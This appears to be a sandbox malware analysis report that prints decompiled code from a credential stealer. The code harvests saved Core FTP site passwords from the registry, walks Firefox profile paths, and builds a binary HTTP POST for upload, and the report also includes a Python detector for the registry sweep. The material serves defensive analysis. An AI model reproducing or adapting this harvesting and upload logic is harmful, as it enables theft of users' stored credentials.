• Instruction Fuzzy Hash: 2571B9B1E212299FDB209F55CC85F9EBBB9FB04254F0085EAE509A7241DB709E84CF61
Uniqueness

Uniqueness Score: 100.00%

Control-flow Graph

C-Code - Quality: 71%
E0BC01BF7(char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
	void* _v8;
	void* _v12;
	void* _v16;
	short _v18;
	char _v20;
	signed int _v24;
	long _v28;
	char _v32;
	long _v44;
	char* _v48;
	signed short _v68;
	long _v72;
	intOrPtr _v76;
	void* _v92;
	void* __ebx;
	void* __esi;
	void* _t55;
	int _t60;
	char* _t73;
	void* _t76;
	short _t79;
	void* _t83;
	void* _t85;
	signed int _t86;
	char* _t87;
	void* _t97;
	void* _t98;
	void* _t105;

	_v24 = _v24 & 0x00000000;
	_v32 = 0x1000;
	_v12 = LocalAlloc(0x40, 0x1080);
	_t87 = LocalAlloc(0x40, 0x1080);
	_v8 = LocalAlloc(0x40, 0x1080);
	_t55 = LocalAlloc(0x40, 0x1080);
	_t97 = 0x3c;
	_v16 = _t55;
	E0BC08D5E( &_v92,  &_v92, 0, _t97);
	_v76 = _v12;
	_v92 = _t97;
	_v48 = _t87;
	_v72 = 0xfff;
	_v44 = 0xfff;
	_t60 = InternetCrackUrlA(_a4, 0, 0x80000000,  &_v92); // executed
	if(_t60 != 0 && _v76 != 0) {
		_v28 = 0xfff;
		if(InternetCreateUrlA( &_v92, 0x80000000, _v8,  &_v28) != 0) {
			_t98 = 0x3c;
			 *_t87 = 0;
			E0BC08D5E( &_v92,  &_v92, 0, _t98);
			_v92 = _t98;
			_v48 = _t87;
			_v72 = 0xfff;
			_v44 = 0xfff;
			if(InternetCrackUrlA(_v8, 0, 0,  &_v92) != 0 && _v76 != 0) {
				_t73 =  &_v32;
				__imp__ObtainUserAgentString(0, _v16, _t73); // executed
				if(_t73 < 0) {
					_push("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
				} else {
					_push(_v16);
				}
				_push(_a12);
				_push(_v12);
				_push(_t87);
				wsprintfA(_v8, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nUser-Agent: %s\r\nContent-Encoding: binary\r\n\r\n");
				_t76 = E0BC017C5(_t87, _t98, _v12, _v68 & 0x0000ffff); // executed
				_t105 = _t76;
				if(_t105 != 0) {
					_v20 = 1;
					_t79 = 0x2d;
					_v18 = _t79;
					__imp__#21(_t105, 0xffff, 0x80,  &_v20, 4); // executed
					_t83 = E0BC0184B(_v8, _t105, lstrlenA(_v8)); // executed
					if(_t83 != 0 && _a12 != 0) {
						_t85 = E0BC0184B(_a8, _t105, _a12); // executed
						if(_t85 != 0) {
							_t86 = E0BC018F2(_t105, _a16, _a20); // executed
							_v24 = _t86;
						}
					}
					__imp__#3(_t105); // executed
				}
			}
		}
	}
	E0BC08D3D(_v12);
	E0BC08D3D(_v8);
	E0BC08D3D(_t87);
	E0BC08D3D(_v16);
	return _v24;
}

0x0bc01bfd
0x0bc01c12
0x0bc01c1e
0x0bc01c26
0x0bc01c2d
0x0bc01c30
0x0bc01c34
0x0bc01c36
0x0bc01c3f
0x0bc01c4d
0x0bc01c63
0x0bc01c66
0x0bc01c69
0x0bc01c6c
0x0bc01c6f
0x0bc01c73
0x0bc01c93
0x0bc01c9e
0x0bc01ca6
0x0bc01cae
0x0bc01cb1
0x0bc01cc1
0x0bc01cc4
0x0bc01cc7
0x0bc01cca
0x0bc01cd1
0x0bc01ce2
0x0bc01cea
0x0bc01cf2
0x0bc01cf9
0x0bc01cf4
0x0bc01cf4
0x0bc01cf4
0x0bc01cfe
0x0bc01d01
0x0bc01d04
0x0bc01d0d
0x0bc01d1e
0x0bc01d23
0x0bc01d28
0x0bc01d2f
                                                                                                                                        0x0bc01d33
                                                                                                                                        0x0bc01d36
                                                                                                                                        0x0bc01d49
                                                                                                                                        0x0bc01d5d
                                                                                                                                        0x0bc01d66
                                                                                                                                        0x0bc01d74
                                                                                                                                        0x0bc01d7d
                                                                                                                                        0x0bc01d86
                                                                                                                                        0x0bc01d8e
                                                                                                                                        0x0bc01d8e
                                                                                                                                        0x0bc01d7d
                                                                                                                                        0x0bc01d92
                                                                                                                                        0x0bc01d92
                                                                                                                                        0x0bc01d28
                                                                                                                                        0x0bc01cd1
                                                                                                                                        0x0bc01c9e
                                                                                                                                        0x0bc01d9b
                                                                                                                                        0x0bc01da4
                                                                                                                                        0x0bc01dab
                                                                                                                                        0x0bc01db4
                                                                                                                                        0x0bc01dc1

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00001080,00000000,00000000,00000000), ref: 0BC01C19
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00001080,?,?,?,?,?,?,?,?,?,?,?,?,?,0BC0131A), ref: 0BC01C21
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00001080,?,?,?,?,?,?,?,?,?,?,?,?,?,0BC0131A), ref: 0BC01C28
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00001080,?,?,?,?,?,?,?,?,?,?,?,?,?,0BC0131A), ref: 0BC01C30
                                                                                                                                        • InternetCrackUrlA.WININET(?,00000000,80000000,?), ref: 0BC01C6F
                                                                                                                                        • InternetCreateUrlA.WININET(?,80000000,?,00000000), ref: 0BC01C96
                                                                                                                                        • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0BC01CCD
                                                                                                                                        • ObtainUserAgentString.URLMON(00000000,?,00001000), ref: 0BC01CEA
                                                                                                                                        • wsprintfA.USER32 ref: 0BC01D0D
                                                                                                                                        • setsockopt.WS2_32(00000000,0000FFFF,00000080,?,00000004), ref: 0BC01D49
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0BC01D52
                                                                                                                                        • closesocket.WS2_32(00000000), ref: 0BC01D92
                                                                                                                                        Strings
                                                                                                                                        • Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0), xrefs: 0BC01CF9
                                                                                                                                        • POST %s HTTP/1.0Host: %sAccept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeUser-Agent: %sContent-Encoding: binary, xrefs: 0BC01D05
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocLocal$Internet$Crack$AgentCreateObtainStringUserclosesocketlstrlensetsockoptwsprintf
                                                                                                                                        • String ID: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)$POST %s HTTP/1.0Host: %sAccept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeUser-Agent: %sContent-Encoding: binary
                                                                                                                                        • API String ID: 3003103680-656120281
                                                                                                                                        • Opcode ID: 1ef1998c43e9a83fcc0bd22cd401f9e67903ccdc8d1cd2d51cb87db96fada140
                                                                                                                                        • Instruction ID: dbd16cbb6b1ffcce5f4987a6dc74416aff558384aa8559321fd6d82dff0dcadb
                                                                                                                                        • Opcode Fuzzy Hash: 1ef1998c43e9a83fcc0bd22cd401f9e67903ccdc8d1cd2d51cb87db96fada140
                                                                                                                                        • Instruction Fuzzy Hash: 12515871920319AEEF119FE5CC45FEEBBB8EF44710F244126FA04B6190DB719A41DBA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                        			E0BC06713(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                        				CHAR* _v8;
                                                                                                                                        				intOrPtr _v12;
                                                                                                                                        				CHAR* _v16;
                                                                                                                                        				void* __esi;
                                                                                                                                        				void* _t25;
                                                                                                                                        				void* _t27;
                                                                                                                                        				CHAR* _t28;
                                                                                                                                        				CHAR* _t31;
                                                                                                                                        				void* _t39;
                                                                                                                                        				long _t40;
                                                                                                                                        				long _t43;
                                                                                                                                        				int _t44;
                                                                                                                                        				char* _t47;
                                                                                                                                        				CHAR* _t50;
                                                                                                                                        				char _t58;
                                                                                                                                        				void* _t59;
                                                                                                                                        				CHAR* _t61;
                                                                                                                                        				intOrPtr _t62;
                                                                                                                                        				CHAR* _t63;
                                                                                                                                        				intOrPtr* _t65;
                                                                                                                                        
                                                                                                                                        				_t59 = __edx;
                                                                                                                                        				_t62 = _a8;
                                                                                                                                        				_t25 = E0BC0912B(_t62);
                                                                                                                                        				if(_t25 != 0) {
                                                                                                                                        					_t25 = E0BC0912B(_a12);
                                                                                                                                        					if(_t25 != 0) {
                                                                                                                                        						_t27 = E0BC08F95(_t62);
                                                                                                                                        						_push(_t62);
                                                                                                                                        						if(_t27 != 0) {
                                                                                                                                        							_t28 = 0;
                                                                                                                                        						} else {
                                                                                                                                        							_t28 = "\\";
                                                                                                                                        						}
                                                                                                                                        						_v12 = E0BC08EE2(_t28);
                                                                                                                                        						_t31 = E0BC08EE2("profiles.ini", _t29);
                                                                                                                                        						 *_t65 = 0xfe6a;
                                                                                                                                        						_v8 = _t31;
                                                                                                                                        						_t63 = LocalAlloc(0x40, ??);
                                                                                                                                        						_v16 = _t63;
                                                                                                                                        						_t50 = LocalAlloc(0x40, 0x1080);
                                                                                                                                        						if(E0BC090FC(_v8) == 0) {
                                                                                                                                        							L20:
                                                                                                                                        							E0BC08D3D(_v12);
                                                                                                                                        							E0BC08D3D(_t50);
                                                                                                                                        							E0BC08D3D(_v8);
                                                                                                                                        							E0BC08D3D(_t63); // executed
                                                                                                                                        							_t39 = E0BC06401(_t59, _a4, _a8, _a12, _a8); // executed
                                                                                                                                        							return _t39;
                                                                                                                                        						} else {
                                                                                                                                        							_t40 = GetPrivateProfileSectionNamesA(_t63, 0xfde8, _v8); // executed
                                                                                                                                        							if(_t40 > 2 &&  *_t63 != 0) {
                                                                                                                                        								_t61 = _t63;
                                                                                                                                        								do {
                                                                                                                                        									if(StrStrIA(_t61, "Profile") == 0) {
                                                                                                                                        										goto L19;
                                                                                                                                        									}
                                                                                                                                        									_t43 = GetPrivateProfileStringA(_t61, "Path", 0xbc0d832, _t50, 0xfff, _v8); // executed
                                                                                                                                        									if(_t43 == 0) {
                                                                                                                                        										goto L19;
                                                                                                                                        									}
                                                                                                                                        									_t44 = GetPrivateProfileIntA(_t61, "IsRelative", 1, _v8); // executed
                                                                                                                                        									if(_t44 != 1) {
                                                                                                                                        										E0BC06401(_t59, _a4, _t50, _a12, _t50);
                                                                                                                                        										_t65 = _t65 + 0x10;
                                                                                                                                        										goto L19;
                                                                                                                                        									}
                                                                                                                                        									_t47 = E0BC08EE2(_t50, _v12);
                                                                                                                                        									_t64 = _t47;
                                                                                                                                        									if(_t47 == 0) {
                                                                                                                                        										L17:
                                                                                                                                        										E0BC06401(_t59, _a4, _t64, _a12, _t64); // executed
                                                                                                                                        										E0BC08D3D(_t64);
                                                                                                                                        										_t63 = _v16;
                                                                                                                                        										_t65 = _t65 + 0x14;
                                                                                                                                        										goto L19;
                                                                                                                                        									} else {
                                                                                                                                        										goto L13;
                                                                                                                                        									}
                                                                                                                                        									while(1) {
                                                                                                                                        										L13:
                                                                                                                                        										_t58 =  *_t47;
                                                                                                                                        										if(_t58 == 0) {
                                                                                                                                        											goto L17;
                                                                                                                                        										}
                                                                                                                                        										if(_t58 == 0x2f) {
                                                                                                                                        											 *_t47 = 0x5c;
                                                                                                                                        										}
                                                                                                                                        										_t47 = _t47 + 1;
                                                                                                                                        										if(_t47 != 0) {
                                                                                                                                        											continue;
                                                                                                                                        										} else {
                                                                                                                                        											goto L17;
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        									goto L17;
                                                                                                                                        									L19:
                                                                                                                                        									_t61 =  &(_t61[lstrlenA(_t61) + 1]);
                                                                                                                                        								} while ( *_t61 != 0);
                                                                                                                                        							}
                                                                                                                                        							goto L20;
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return _t25;
                                                                                                                                        			}
























APIs
  • Part of subcall function 0BC0912B: GetFileAttributesA.KERNELBASE(?,0BC06726), ref: 0BC09135
  • Part of subcall function 0BC08F95: lstrlenA.KERNEL32(?,0BC09A2B,?,?,?), ref: 0BC08F9F
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0BC06777
• LocalAlloc.KERNEL32(00000040,00001080), ref: 0BC06785
• GetPrivateProfileSectionNamesA.KERNEL32 ref: 0BC067A2
• StrStrIA.SHLWAPI(00000000,Profile), ref: 0BC067C2
• GetPrivateProfileStringA.KERNEL32(00000000,Path,0BC0D832,00000000,00000FFF,?), ref: 0BC067E4
• GetPrivateProfileIntA.KERNEL32 ref: 0BC067F9
• lstrlenA.KERNEL32(00000000), ref: 0BC06852
  • Part of subcall function 0BC06401: FindFirstFileA.KERNELBASE(?,?,?,00000000,00000140), ref: 0BC0648E
  • Part of subcall function 0BC06401: lstrcmpiA.KERNEL32(0BC0D7EC,?), ref: 0BC064C3
  • Part of subcall function 0BC06401: lstrcmpiA.KERNEL32(0BC0D7F0,?), ref: 0BC064D9
  • Part of subcall function 0BC06401: FindNextFileA.KERNELBASE(?,00000010), ref: 0BC066DA
  • Part of subcall function 0BC06401: FindClose.KERNELBASE(?), ref: 0BC066EE
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: FileFindPrivateProfile$AllocLocallstrcmpilstrlen$AttributesCloseFirstNamesNextSectionString
• String ID: IsRelative$Path$Profile$profiles.ini
• API String ID: 3672316223-4107377610
• Opcode ID: 465baf3983fb2ab2cf8d51e3658a1ee88abf0f2af27dd1159943e6a3925a807a
• Instruction ID: 6bd93800c8505c063e161b823bcc9f341008a321cbbb58a2a26983202f8074bf
• Opcode Fuzzy Hash: 465baf3983fb2ab2cf8d51e3658a1ee88abf0f2af27dd1159943e6a3925a807a
• Instruction Fuzzy Hash: 14410371935205BFEF116FA4CC06B6E3BA9EF00644F148174FA00A61C1EF71CA21ABB1
Uniqueness

Uniqueness Score: 1.18%

Control-flow Graph

C-Code - Quality: 89%
                                                                                                                                        			E0BC03972(void* __ecx, void* __edx) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				char _v2056;
                                                                                                                                        				void* _v2060;
                                                                                                                                        				int* _v2064;
                                                                                                                                        				intOrPtr _v2068;
                                                                                                                                        				intOrPtr _v2072;
                                                                                                                                        				int _v2076;
                                                                                                                                        				intOrPtr _v2080;
                                                                                                                                        				char* _v2084;
                                                                                                                                        				char _v2088;
                                                                                                                                        				intOrPtr _v2092;
                                                                                                                                        				intOrPtr* _v2096;
                                                                                                                                        				char _v2100;
                                                                                                                                        				intOrPtr _v2104;
                                                                                                                                        				char _v2108;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				signed int _t50;
                                                                                                                                        				long _t53;
                                                                                                                                        				intOrPtr _t60;
                                                                                                                                        				char* _t64;
                                                                                                                                        				intOrPtr* _t66;
                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                        				void* _t95;
                                                                                                                                        				void* _t103;
                                                                                                                                        				void* _t106;
                                                                                                                                        				void* _t107;
                                                                                                                                        				void* _t108;
                                                                                                                                        				signed int _t110;
                                                                                                                                        				void* _t111;
                                                                                                                                        				void* _t113;
                                                                                                                                        				void* _t114;
                                                                                                                                        				void* _t115;
                                                                                                                                        
                                                                                                                                        				_t106 = __edx;
                                                                                                                                        				_t50 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_v8 = _t50 ^ _t110;
                                                                                                                                        				_t107 = __ecx; // executed
                                                                                                                                        				_t53 = RegOpenKeyA(0x80000001, "Software\\FTPWare\\COREFTP\\Sites",  &_v2060); // executed
                                                                                                                                        				if(_t53 != 0) {
                                                                                                                                        					L19:
                                                                                                                                        					return E0BC09FDC(_t53, _t95, _v8 ^ _t110, _t106, _t107, _t108);
                                                                                                                                        				}
                                                                                                                                        				_push(_t108);
                                                                                                                                        				_v2064 = 0;
                                                                                                                                        				_v2076 = 0x7ff;
                                                                                                                                        				if(RegEnumKeyExA(_v2060, 0,  &_v2056,  &_v2076, 0, 0, 0, 0) != 0) {
                                                                                                                                        					L18:
                                                                                                                                        					_t53 = RegCloseKey(_v2060);
                                                                                                                                        					_pop(_t108);
                                                                                                                                        					goto L19;
                                                                                                                                        				}
                                                                                                                                        				_push(_t95);
                                                                                                                                        				do {
                                                                                                                                        					_t60 = E0BC08F32(E0BC08EE2("\\", "Software\\FTPWare\\COREFTP\\Sites"),  &_v2056);
                                                                                                                                        					_t96 = _t60;
                                                                                                                                        					_v2104 = _t60;
                                                                                                                                        					_v2072 = E0BC08DDA(0,  *0xbc10010, _t60, "PW", 0, 0);
                                                                                                                                        					_v2068 = E0BC08DDA(0,  *0xbc10010, _t96, "Host", 0, 0);
                                                                                                                                        					_v2080 = E0BC08DDA(0,  *0xbc10010, _t96, "User", 0, 0);
                                                                                                                                        					_t64 = E0BC08DDA(0,  *0xbc10010, _t96, "PthR", 0, 0);
                                                                                                                                        					_t113 = _t111 + 0x5c;
                                                                                                                                        					_v2084 = _t64;
                                                                                                                                        					if(_t64 == 0) {
                                                                                                                                        						_v2084 = " ";
                                                                                                                                        					}
                                                                                                                                        					_t66 = E0BC08DDA(0,  *0xbc10010, _t96, "Port",  &_v2108, 0);
                                                                                                                                        					_t114 = _t113 + 0x14;
                                                                                                                                        					if(_t66 == 0 || _v2108 != 4) {
                                                                                                                                        						E0BC08D3D(_t66);
                                                                                                                                        						_v2092 = 0x15;
                                                                                                                                        					} else {
                                                                                                                                        						_v2092 =  *_t66;
                                                                                                                                        						E0BC08D3D(_t66);
                                                                                                                                        					}
                                                                                                                                        					_pop(_t103);
                                                                                                                                        					_t69 = E0BC08DDA(0,  *0xbc10010, _t96, "SSH",  &_v2100, 0);
                                                                                                                                        					_t115 = _t114 + 0x14;
                                                                                                                                        					_v2096 = _t69;
                                                                                                                                        					if(_v2072 != 0 && _v2068 != 0 && _v2080 != 0) {
                                                                                                                                        						_v2088 = 0xbeef0010;
                                                                                                                                        						E0BC08A41( &_v2088, _t103, _t107, 4);
                                                                                                                                        						E0BC08C6D(_t107, _t103, _v2068);
                                                                                                                                        						E0BC08C6D(_t107, _t103, _v2080);
                                                                                                                                        						E0BC08C6D(_t107, _t103, _v2072);
                                                                                                                                        						E0BC08C37(_v2092);
                                                                                                                                        						E0BC08C6D(_t107, _t103, _v2084);
                                                                                                                                        						_t90 = _v2096;
                                                                                                                                        						_t115 = _t115 + 0x14;
                                                                                                                                        						if(_v2096 == 0 || _v2100 != 4) {
                                                                                                                                        							_v2088 = 0;
                                                                                                                                        							E0BC08A41( &_v2088, _t103, _t107, 4);
                                                                                                                                        						} else {
                                                                                                                                        							E0BC08C37( *_t90);
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                         					E0BC08D3D(_v2072); // E0BC08D3D releases the per-site buffers (wraps LocalFree, see the subcall note under APIs)
                                                                                                                                        					E0BC08D3D(_v2068);
                                                                                                                                        					E0BC08D3D(_v2080);
                                                                                                                                        					E0BC08D3D(_v2084);
                                                                                                                                        					E0BC08D3D(_v2096);
                                                                                                                                        					E0BC08D3D(_v2104);
                                                                                                                                        					_t111 = _t115 + 0x18;
                                                                                                                                        					_v2064 = _v2064 + 1;
                                                                                                                                        					_v2076 = 0x7ff;
                                                                                                                                         				} while (RegEnumKeyExA(_v2060, _v2064,  &_v2056,  &_v2076, 0, 0, 0, 0) == 0); // next subkey of Software\FTPWare\COREFTP\Sites, i.e. the next saved Core FTP site
                                                                                                                                        				_pop(_t95);
                                                                                                                                        				goto L18;
                                                                                                                                         			}

                                                                                                                                         Instruction address column (one address per C-code line above, 0x0bc03972 .. 0x0bc03c32; line alignment lost in extraction)

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,Software\FTPWare\COREFTP\Sites,?), ref: 0BC03999
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC039D3
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0BC03C1F
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(00000000,HWID,?,?), ref: 0BC08F07
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(HWID), ref: 0BC08F0C
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcpyA.KERNEL32(00000000,00000000), ref: 0BC08F1D
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcatA.KERNEL32(00000000,HWID), ref: 0BC08F25
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
                                                                                                                                          • Part of subcall function 0BC08DDA: RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,HWID,?,HWID,?,?), ref: 0BC08E1A
                                                                                                                                          • Part of subcall function 0BC08DDA: RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000), ref: 0BC08E3B
                                                                                                                                          • Part of subcall function 0BC08DDA: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?), ref: 0BC08E69
                                                                                                                                          • Part of subcall function 0BC08DDA: RegCloseKey.KERNELBASE(?), ref: 0BC08E8C
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000), ref: 0BC03C0A
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$CloseEnumOpenQueryValuelstrcatlstrcpy$FreeLocal
                                                                                                                                        • String ID: Host$Port$PthR$SSH$Software\FTPWare\COREFTP\Sites$User
                                                                                                                                        • API String ID: 1412871966-1877655602
                                                                                                                                        • Opcode ID: 59b5290f55eafa3f733aa709a44687cf0adcf6fc89edb3bdf58fca88d61d59fb
                                                                                                                                        • Instruction ID: a24a6e1eb660b2f24410d44909a583ce8941715fac0fab7c52f4ec5d9ef98081
                                                                                                                                        • Opcode Fuzzy Hash: 59b5290f55eafa3f733aa709a44687cf0adcf6fc89edb3bdf58fca88d61d59fb
                                                                                                                                        • Instruction Fuzzy Hash: 62617FB0A31228AECF21AB54CC45ADA7AFDFF45640F00C5E5E589A1190DE718F81EFE0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%
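The routine above is a textbook credential-store sweep: open `HKCU\Software\FTPWare\COREFTP\Sites`, enumerate one subkey per saved site, open each subkey and query its values, close, repeat. The following detector is an added example, not code from the report or from the sample: it parses API-call lines written in the report's own `Name.Module(args), ref: ADDR` form and raises a finding whenever a known credential-store key is opened and then enumerated and queried. The Core FTP path and the value names come from this report; the PuTTY sessions path, the hive table and the sample trace are assumptions constructed for illustration (the report's own trace shows `?` where the sandbox did not resolve an argument), and the check generalises to any path added to `CREDENTIAL_STORES`.

```python
"""Flag registry credential-store harvesting in a sandbox API trace.

Added example, not code from the Joe Sandbox report or from the sample.  It
parses API-call lines in the report's "Name.Module(args), ref: ADDR" form and
raises a finding when a known credential-store key is opened and then
enumerated and queried, which is what the decompiled Core FTP routine does
(RegOpenKeyA -> RegEnumKeyExA -> RegOpenKeyExA/RegQueryValueExA per site ->
RegCloseKey).
"""
import re
from dataclasses import dataclass, field

# One API line of the report, e.g.
#   RegOpenKeyA.ADVAPI32(80000001,Software\FTPWare\COREFTP\Sites,?), ref: 0BC03999
API_LINE = re.compile(
    r"(?P<api>[A-Za-z0-9_#]+)\.(?P<module>[A-Za-z0-9]+)\((?P<args>[^)]*)\)"
    r"(?:,\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)

# Predefined hive handles as they appear in the trace (assumed mapping).
HIVES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM"}

# Keys whose subkeys hold saved sessions.  The Core FTP path is taken from the
# report; the PuTTY path is an assumption added to show the check generalises.
CREDENTIAL_STORES = {
    r"software\ftpware\coreftp\sites": "Core FTP saved sites",
    r"software\simontatham\putty\sessions": "PuTTY saved sessions (assumed path)",
}


@dataclass
class Finding:
    store: str
    hive: str
    open_ref: str               # address of the RegOpenKey call in the dump
    subkeys_enumerated: int = 0
    values_queried: list = field(default_factory=list)


def parse_trace(text):
    """Yield (api, args, ref) for each API line; other lines are ignored."""
    for raw in text.splitlines():
        m = API_LINE.search(raw.strip().lstrip("•").strip())
        if m:
            args = [a.strip() for a in m.group("args").split(",")]
            yield m.group("api"), args, m.group("ref") or ""


def detect_registry_harvesting(text):
    """Return one Finding per credential-store key that is opened and read.

    A finding starts at RegOpenKey* on a watched path and ends when the
    matching RegCloseKey brings the open-key depth back to zero, so the
    per-site RegOpenKeyExA/RegCloseKey pairs issued by the subcall stay
    attributed to the store they were opened under.
    """
    findings, active, depth = [], None, 0
    for api, args, ref in parse_trace(text):
        if api.startswith("RegOpenKey"):
            path = args[1].lower() if len(args) > 1 else ""
            if active is None and path in CREDENTIAL_STORES:
                active = Finding(CREDENTIAL_STORES[path], HIVES.get(args[0], args[0]), ref)
                findings.append(active)
                depth = 1
            elif active is not None:
                depth += 1                      # per-site subkey opened inside the sweep
        elif active is None:
            continue
        elif api.startswith("RegEnumKeyEx"):
            active.subkeys_enumerated += 1
        elif api.startswith("RegQueryValueEx"):
            name = args[1] if len(args) > 1 else "?"
            if name != "?" and name not in active.values_queried:
                active.values_queried.append(name)   # "?" = argument unresolved by the sandbox
        elif api.startswith("RegCloseKey"):
            depth -= 1
            if depth <= 0:
                active, depth = None, 0
    return findings


# Constructed trace in the report's format: one enumerated site whose value
# names (those listed under "String ID" above) are resolved instead of "?".
SAMPLE_TRACE = r"""
RegOpenKeyA.ADVAPI32(80000001,Software\FTPWare\COREFTP\Sites,?), ref: 0BC03999
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC039D3
RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?), ref: 0BC08E1A
RegQueryValueExA.KERNELBASE(?,Host,00000000,00000000,00000000,?), ref: 0BC08E69
RegQueryValueExA.KERNELBASE(?,User,00000000,00000000,00000000,?), ref: 0BC08E69
RegQueryValueExA.KERNELBASE(?,PthR,00000000,00000000,00000000,?), ref: 0BC08E69
RegCloseKey.KERNELBASE(?), ref: 0BC08E8C
RegEnumKeyExA.ADVAPI32(?,00000001,?,000007FF,00000000,00000000,00000000,00000000), ref: 0BC03C0A
RegCloseKey.ADVAPI32(?), ref: 0BC03C1F
LocalFree.KERNELBASE(00000000), ref: 0BC08D49
"""

if __name__ == "__main__":
    for f in detect_registry_harvesting(SAMPLE_TRACE):
        print(f"{f.hive} {f.store}: opened at {f.open_ref}, "
              f"{f.subkeys_enumerated} RegEnumKeyEx calls, values {f.values_queried}")
```

Run against a dynamic API trace the same logic distinguishes a single lookup of one saved site (no RegEnumKeyEx, one value) from a sweep of every site, which is the behaviour worth alerting on; the depth counter is what keeps the nested per-site opens from prematurely closing the finding.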

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                         Control-flow graph of E0BC018F2 (nodes 524-600, blocks bc018f2 .. bc01bf5; edge list omitted). APIs on the path: LocalAlloc, CreateStreamOnHGlobal, recv, StrStrIA, StrToIntA; subcalls bc01885, bc089a1, bc08b39, bc08d3d, bc091e5, bc09fdc.
                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                        			E0BC018F2(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                        				signed int _v12;
                                                                                                                                        				char _v2064;
                                                                                                                                        				void* _v2068;
                                                                                                                                        				void* _v2072;
                                                                                                                                        				char _v2073;
                                                                                                                                        				void* _v2080;
                                                                                                                                        				char _v2084;
                                                                                                                                        				intOrPtr* _v2088;
                                                                                                                                        				intOrPtr _v2092;
                                                                                                                                        				char _v2096;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				signed int _t71;
                                                                                                                                        				char _t77;
                                                                                                                                        				char _t78;
                                                                                                                                        				char* _t79;
                                                                                                                                        				intOrPtr* _t80;
